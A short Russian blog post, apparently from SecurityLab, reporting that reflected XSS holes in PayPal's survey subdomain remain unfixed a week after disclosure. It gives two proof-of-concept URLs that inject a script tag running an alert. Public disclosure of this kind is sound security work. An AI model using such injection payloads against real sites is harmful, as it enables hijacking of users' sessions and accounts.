XSS в PayPal (попытка №2)

XSS в PayPal (попытка №2)
На прошлой неделе SecurityLab опубликовал новость о наличии XSS уязвимостей в PayPal. Неделю спустя исправлена только та уязвимость, на которую была прямая ссылка :). Все остальные до сих пор не исправлены. Примеры:

surveyc.paypal.com/dat.php?m=1>"><script>alert('www.securitylab.ru')</script>&c=0&pg=1

surveyc.paypal.com/login/?target=/rep.php%3Fm%3D2%26c%3D0%26pg%3D7"><script>alert('www.securitylab.ru')</script>&explanation=1

PS. Классная у них безопасность!
Security
Alt text

Валерий Марчук

Блог посвящен безопасности и жизни секлаба